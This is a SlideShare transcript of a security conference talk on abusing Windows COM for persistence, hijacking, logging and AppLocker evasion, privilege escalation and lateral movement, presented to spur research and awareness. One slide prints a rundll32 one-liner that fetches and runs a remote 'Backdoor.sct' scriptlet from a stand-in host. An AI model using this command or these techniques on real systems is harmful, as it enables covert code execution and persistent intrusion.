SlideShare a Scribd company logo

Windows Operating System Archaeology

Download as PPTX, PDF
E
enigma0x3

The document discusses the exploitation of the Windows Component Object Model (COM) for various malicious tactics including hijacking and persistence. It outlines the architecture and history of COM, the registration process, and example methodologies that attackers might use, such as executing code without registration. The talk aims to raise awareness about the vulnerabilities inherent in COM and encourages further research into this attack surface.

Technology
1 of 47
Downloaded 184 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Most read
19
Most read
20
21
22
23
24
25
26
27
28
Most read
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Windows Operating System Archaeology Matt Nelson Casey Smith
Who Are We? - Casey Smith (@subTee) - Mandiant Red Team - subt0x10.blogspot.com - Matt Nelson (@enigma0x3) - Operator and Security Researcher at SpecterOps - enigma0x3.net
Objectives For This Talk Foster curiosity & further research Provide references Call attention to the attack surface and capabilities
What Will We Discuss? COM Overview COM Research Methodology Malicious COM Tactics
COM Overview -Brief Background -Registration -Resolution
COM Architecture and History - in 2 minutes ;-) What are COM components? COM components are cross-language classes backed by: DLL (Dynamic-Link Libraries) OCX (ActiveX controls) TLB (Type Libraries ) EXE (Executables) SCT ( XML files ) Location Transparency Principle
Example - COM Scriptlet XML XML Files - We use these for POC examples Registration Block
COM Object Type Registration To find a component when a program needs it, it is USUALLY registered What Registry keys are related to COM object registration? HKLM + HKCU HKCR
What registry entries are needed to register a COM object? https://blogs.msdn.microsoft.com/larryosterman/2006/01/11/what-registry-entries- are-needed-to-register-a-com-object/ Also XRef: Minimal COM object registration https://blogs.msdn.microsoft.com/larryosterman/2006/01/05/minimal-com-object- registration/
COM Object Type Resolution CLSID - GUID - {AAAA1111-0000-0000-0000-0000FEEDACDC} ProgID - String Monikers - “scriptlet:http://example.com/file.sct” GetObject - CreateObject Methods rundll32.exe javascript:"..mshtml,RunHTMLApplication ";a=GetObject('scriptlet:https://example.com/Backdoor.sct');a.Exec();close();
WMI GetObject example
Registry Example
COM Registry Keys https://msdn.microsoft.com/en-us/library/windows/desktop/ms678477(v=vs.85).aspx Regsvr32.exe Regasm.exe Regsvcs.exe These tools usually handle the registration and registry key population for us.
Example Call To Create/Locate an Object
What does all this mean? COM Artifacts and details can be found in the registry. Usually...
Avoid Registration Process
Sample Objective: Execute .NET code inside Windows Scripting Host Without registering the COM object.
Registration-Free COM Activation Microsoft.Windows.ActCtx Object Attach a Manifest or Download ManifestURL Loads dll without registration. https://github.com/subTee/RegistrationFreeCOM
Windows Operating System Archaeology
RegistrationHelper - Bypass via CScript.exe https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500
Example https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500
In Memory Assembly Execution JScript/VBScript https://github.com/tyranid/DotNetToJScript This is Amazing! Executes a .NET assembly IN JSCRIPT This dramatically extends capabilities of COM Scriptlets No Dll On Disk. Works for .NET 2 and 3.5 Only
Windows Operating System Archaeology
Methodology Examples Using Procmon to trace resolution
Example - There are DOZENS of these
Excavation Tools James Forshaw - OleViewDotNet - https://github.com/tyranid/oleviewdotnet Mark Russonovich - ProcMon - https://technet.microsoft.com/en- us/sysinternals/processmonitor RPCView - http://rpcview.org API Spy - http://www.rohitab.com/apimonitor
Malicious Tactics Overview Persistence COM Hijacking - Evasion Office Add-Ins Privilege Escalation Lateral Movement
Persistence via COM Hijacking Leveraging Per-User COM Objects, we can divert resolution to an object under our control. Registry Only Persistence “TreatAs” hijack COM handler hijacking (scheduled tasks) https://msdn.microsoft.com/en-us/library/windows/desktop/ms679737(v=vs.85).aspx https://github.com/subTee/OSArchaeology/blob/master/COM/TreatAsPersistence.reg https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and- com-handler-hijacking/
Persistence via COM Hijacking
DEMO Registry Only Persistence
Evasion Windows very often resolves COM objects via the HKCU hive first Find your favorite script that implements GetObject() or CreateObject() and hijack it. This allows you to instantiate your own code without exposing it via the command line.
Abusing WSH: VBScript Injection Leverage an existing, signed VBScript to run our code
C:WindowsSystem32Printing_Admin_Scriptsen-US pubprn.vbs For example: Windows printing script pubprn.vbs calls GetObject on a parameter we control. Can use this to execute a COM scriptlet
Example: Evade Command Line Logging slmgr.vbs instantiates Scripting.Dictionary via CreateObject(). Hijack that object to make it run your code
Source Code of Slmgr.vbs Default System File
Example: Evade Command Line Logging
This is also a clever way to bypass AppLocker ;-) Winrm.vbs
Bypass the AntiMalware Scan Interface (AMSI)
Malicious Office Add-ins Outlook, Excel etc. Rich API for persistence and C2 https://twitter.com/JohnLaTwC/status/836259629277421568 Outlook Rules Added Via COM Object https://gist.github.com/subTee/e04a93260cc69772322502545c2121c4 https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
Privilege Escalation The COM Elevation Moniker - Resources -Execute Process in Another user’s session -Think Terminal Server or RDP etc…
COM - CVE-2017-0100 https://drive.google.com/file/d/0B5sMkPVXQnfPbXI0SVliV0tuU0U/view - James Forshaw
Domain Admin Elevation http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html @n0pe_sled
Lateral Movement - Leveraging DCOM objects with no explicit access or launch permissions set - Certain objects have interesting methods… https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application- com-object/ https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Windows Operating System Archaeology
Conclusions
Hopeful outcomes of this talk. Foster curiosity & further research Provide references Call attention to the attack surface and capabilities
Closing Thoughts / Conclusions / Thanks Special Thanks to: David Mcguire & Jason Frank for their support of this research while we were working for them. James Forshaw - For answering our questions and COM research All of the former ATD members who provided feedback and improvements to our research!

More Related Content

PPTX
COM Hijacking Techniques - Derbycon 2019
David Tulis
 
PDF
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
PDF
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
PDF
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
PPTX
Client side attacks using PowerShell
Nikhil Mittal
 
PDF
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
PPTX
Attacking thru HTTP Host header
Sergey Belov
 
PPTX
Security in NodeJS applications
Daniel Garcia (a.k.a cr0hn)
 
COM Hijacking Techniques - Derbycon 2019
David Tulis
 
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Client side attacks using PowerShell
Nikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Attacking thru HTTP Host header
Sergey Belov
 
Security in NodeJS applications
Daniel Garcia (a.k.a cr0hn)
 

What's hot (20)

PPT
Registry forensics
Prince Boonlia
 
PDF
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
PDF
Windows attacks - AT is the new black
Chris Gates
 
PPTX
Directory Traversal & File Inclusion Attacks
Raghav Bisht
 
PDF
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
PDF
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
PDF
RAT - Repurposing Adversarial Tradecraft
⭕Alexander Rymdeko-Harvey
 
PDF
CNIT 126: 10: Kernel Debugging with WinDbg
Sam Bowne
 
PPTX
Introduction to Debuggers
Saumil Shah
 
PPTX
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
PPTX
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
PDF
Useful Linux and Unix commands handbook
Wave Digitech
 
PDF
Complete Guide for Linux shell programming
sudhir singh yadav
 
PDF
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Cyber Security Alliance
 
PPTX
Metasploit
Lalith Sai
 
PDF
Play with FILE Structure - Yet Another Binary Exploit Technique
Angel Boy
 
PPTX
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
PPTX
Basic commands of linux
shravan saini
 
PDF
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Abraham Aranguren
 
PDF
Petit potam slides-rtfm-ossir
LionelTopotam
 
Registry forensics
Prince Boonlia
 
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
Windows attacks - AT is the new black
Chris Gates
 
Directory Traversal & File Inclusion Attacks
Raghav Bisht
 
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
RAT - Repurposing Adversarial Tradecraft
⭕Alexander Rymdeko-Harvey
 
CNIT 126: 10: Kernel Debugging with WinDbg
Sam Bowne
 
Introduction to Debuggers
Saumil Shah
 
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
Useful Linux and Unix commands handbook
Wave Digitech
 
Complete Guide for Linux shell programming
sudhir singh yadav
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Cyber Security Alliance
 
Metasploit
Lalith Sai
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Angel Boy
 
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
Basic commands of linux
shravan saini
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Abraham Aranguren
 
Petit potam slides-rtfm-ossir
LionelTopotam
 
Ad

Similar to Windows Operating System Archaeology (20)

PDF
BSides Iowa 2018: Windows COM: Red vs Blue
Andrew Freeborn
 
PDF
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
MITRE ATT&CK
 
PDF
CNIT 152: 12b Windows Registry
Sam Bowne
 
PDF
CNIT 152 12 Investigating Windows Systems (Part 2)
Sam Bowne
 
PDF
Blackhat USA 2011 - Cesar Cerrudo - Easy and quick vulnerability hunting in W...
Michael Boman
 
PDF
Analyzing The Audit Statement Provided By The Information...
April Charlton
 
PDF
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
Felipe Prado
 
PPTX
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
PDF
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
PDF
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
PPTX
Not a Security Boundary: Bypassing User Account Control
enigma0x3
 
PDF
What Installation Authors Need to Know about COM Extraction
Flexera
 
PDF
Esage on non-existent 0-days, stable binary exploits and user interaction
DefconRussia
 
PPTX
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
PPT
Dominique
Shmulik Avidan
 
PPT
Vista Forensics
CTIN
 
PPTX
Lannguyen-Detecting Cyber Attacks
Security Bootcamp
 
PPTX
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
enigma0x3
 
PDF
Update from the MITRE ATT&CK Team
Adam Pennington
 
PDF
Getting Bear-y Cozy with PowerShell
JamieWilliams130
 
BSides Iowa 2018: Windows COM: Red vs Blue
Andrew Freeborn
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
MITRE ATT&CK
 
CNIT 152: 12b Windows Registry
Sam Bowne
 
CNIT 152 12 Investigating Windows Systems (Part 2)
Sam Bowne
 
Blackhat USA 2011 - Cesar Cerrudo - Easy and quick vulnerability hunting in W...
Michael Boman
 
Analyzing The Audit Statement Provided By The Information...
April Charlton
 
DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides
Felipe Prado
 
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
Not a Security Boundary: Bypassing User Account Control
enigma0x3
 
What Installation Authors Need to Know about COM Extraction
Flexera
 
Esage on non-existent 0-days, stable binary exploits and user interaction
DefconRussia
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
Dominique
Shmulik Avidan
 
Vista Forensics
CTIN
 
Lannguyen-Detecting Cyber Attacks
Security Bootcamp
 
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
enigma0x3
 
Update from the MITRE ATT&CK Team
Adam Pennington
 
Getting Bear-y Cozy with PowerShell
JamieWilliams130
 
Ad

Recently uploaded (20)

DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
PDF
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
A Presentation on Artificial Intelligence
memembruh336
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
Cloud computing and distributed systems.
kkkkkhan
 
Teaching material agriculture food technology
LiaRayya
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
Encapsulation theory and applications.pdf
gurumoop
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 

Windows Operating System Archaeology

Editor's Notes

  • #2: Casey
  • #3: Casey/Matt
  • #4: Casey
  • #5: Casey
  • #6: Casey
  • #7: Casey https://cansecwest.com/slides/2015/Smart_COM_Fuzzing_Auditing_IE_Sandbox_Bypass_in_COM_Objects-Xiaoning_li.pdf https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf COM Specification: http://www.daimi.au.dk/~datpete/COT/COM_SPEC/pdf/com_spec.pdf Windows COM Dependency/History/Origins James Forshaw’s talk at Troopers and Infiltrate
  • #8: Casey Necessary For GetObject
  • #9: Casey AppID, CLSID Explain HKCR vs hkcu/hklm
  • #10: Casey
  • #11: Casey https://blogs.msdn.microsoft.com/cristib/2012/10/31/how-com-works-how-to-build-a-com-visible-dll-in-c-net-call-it-from-vba-and-select-the-proper-classinterface-autodispatch-autodual-part12/ Be sure to reference script:http for Matt’s malicious demos
  • #12: Casey Importance Of GetObject
  • #13: Casey
  • #15: Casey From COM Specification
  • #16: Casey
  • #17: Casey
  • #19: Casey
  • #21: Casey
  • #22: Casey (maybe add arrows)
  • #23: Casey
  • #25: Matt Resolution fails as well
  • #26: Matt (reference treatas)
  • #27: Casey/Matt
  • #28: Matt
  • #29: Matt http://www.nobunkum.ru/analytics/en-com-hijacking https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence https://attack.mitre.org/wiki/Technique/T1122
  • #30: Matt
  • #31: Matt
  • #32: Matt
  • #33: Matt
  • #34: Matt Source Code of pubprn.vbs Injectable args(1)
  • #35: Matt
  • #36: Matt Point out why that injection is possible. We can hijack the script at CreateObject - before the rest of the logic!
  • #37: Matt
  • #38: Matt
  • #39: Matt
  • #40: Matt
  • #41: Casey https://msdn.microsoft.com/en-us/library/ms679687.aspx - COM Elevation Moniker https://bugs.chromium.org/p/project-zero/issues/detail?id=1021&can=1&q=&sort=-id%20-%20P0%20EoP Reference Julian n0pe_sleds write up once posted on using this trick to get DA. http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html
  • #42: Casey https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=262285 http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html Windows HelpPane Elevation of Privilege Vulnerability - CVE-2017-0100 An elevation of privilege exists in Windows when a DCOM object in Helppane.exe configured to run as the interactive user fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session. To exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability once another user logged in to the same system via Terminal Services or Fast User Switching. The update addresses the vulnerability by correcting how Helppane.exe authenticates the client. The following table contains links to the standard entry for each vulnerability in the Common Vulnerabilities and Exposures list: Vulnerability title CVE number Publicly disclosed Exploited Windows HelpPane Elevation of Privilege Vulnerability CVE-2017-0100 No No
  • #43: Casey
  • #44: Matt
  • #45: Matt
  • #48: Matt